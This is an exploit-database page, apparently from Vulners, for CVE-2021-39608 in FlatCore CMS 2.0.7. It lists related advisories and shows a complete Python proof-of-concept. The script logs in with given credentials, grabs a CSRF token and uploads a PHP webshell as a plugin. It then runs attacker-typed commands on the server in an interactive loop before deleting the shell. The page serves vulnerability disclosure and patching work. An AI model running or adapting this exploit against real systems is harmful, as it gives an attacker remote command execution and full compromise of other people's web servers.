Vulners
Lucene search
FlatCore CMS 2.0.7 - Remote Code Execution (RCE) (Authenticated)
| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
 | FlatCore CMS 2.0.7 - Remote Code Execution (Authenticated) Vulnerability | 6 Sep 202100:00 | – | zdt |
 | CVE-2021-39608 | 24 Aug 202100:23 | – | circl |
 | FlatCore-CMS 代码问题漏洞 | 23 Aug 202100:00 | – | cnnvd |
 | flatCore remote code execution vulnerability | 24 Aug 202100:00 | – | cnvd |
 | FlatCore CMS Remote Code Execution (CVE-2021-39608) | 7 Nov 202100:00 | – | checkpoint_advisories |
 | CVE-2021-39608 | 23 Aug 202120:28 | – | cve |
 | CVE-2021-39608 | 23 Aug 202120:28 | – | cvelist |
 | CVE-2021-39608 | 23 Aug 202121:15 | – | nvd |
 | FlatCore CMS 2.0.7 Remote Code Execution | 5 Sep 202100:00 | – | packetstorm |
 | Remote code execution | 23 Aug 202121:15 | – | prion |
10
# Exploit Title: FlatCore CMS 2.0.7 - Remote Code Execution (RCE) (Authenticated)
# Date: 04/10/2021
# Exploit Author: Mason Soroka-Gill @sgizoid
# Vendor Homepage: https://flatcore.org/
# Software Link: https://github.com/flatCore/flatCore-CMS/archive/refs/tags/v2.0.7.tar.gz
# Version: 2.0.7
# Tested on: Ubuntu Server 21.04
# CVE: CVE-2021-39608
# References:
# - https://github.com/flatCore/flatCore-CMS/issues/52
#!/usr/bin/env python3
import sys
import requests
from lxml import html
from urllib.parse import urlencode
if len(sys.argv) != 4:
print(f"Usage: {sys.argv[0]} 'http(s)://TARGET' 'USERNAME' 'PASSWORD'")
exit(1)
TARGET = sys.argv[1]
USERNAME = sys.argv[2]
PASSWORD = sys.argv[3]
# attempt to log in
resp = requests.post(f"{TARGET}/index.php?p=1",
data={
"login_name":f"{USERNAME}",
"login_psw":f"{PASSWORD}",
"login":"Anmelden"})
# grab the PHP session ID
PHPSESSID = resp.headers['Set-Cookie'].split(";")[0]
# validate credentials worked
resp = requests.get(f"{TARGET}/acp/acp.php?tn=addons",
headers={"Cookie":PHPSESSID})
if resp.status_code != 200:
print("Invalid credentials")
exit(1)
else:
print("Logged in")
# grab the csrf token for the script upload
csrf_token = html.document_fromstring(resp.text).xpath('//form/input[7]')[0].value
# post the shell to the host
resp = requests.post(f"{TARGET}/acp/core/files.upload-script.php",
data={"upload_type":"plugin", "csrf_token":csrf_token}, # the csrf token
files={"file":("sgizoid.php", "<?php echo shell_exec($_GET['sg']); ?>")}, # the webshell
headers={"Cookie":PHPSESSID}) # the php session id
# pretend to be a shell
while True:
command = input("$ ")
if command.lower() == "exit" or command.lower() == "q":
break
resp = requests.get(f"{TARGET}/upload/plugins/sgizoid.php?{urlencode({'sg':command})}")
# verify payload succeeded
if resp.status_code == 200:
print(resp.text)
else:
print("Error: Something went wrong, maybe the shell didn't work?")
break
# delete the webshell
resp = requests.get(f"{TARGET}/acp/acp.php?tn=moduls&sub=u&dir=plugins&del=sgizoid.php",
headers={"Cookie":PHPSESSID})
if resp.status_code == 200:
print("Cleaned up webshell")
# clean up the session
resp = requests.get(f"{TARGET}/index.php?goto=logout",
headers={"Cookie":PHPSESSID})
if resp.status_code == 200:
print("Logged out")
exit(0)Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
06 Sep 2021 00:00Current
7High risk
Vulners AI Score7
CVSS 3.17.2
CVSS 29
EPSS0.16897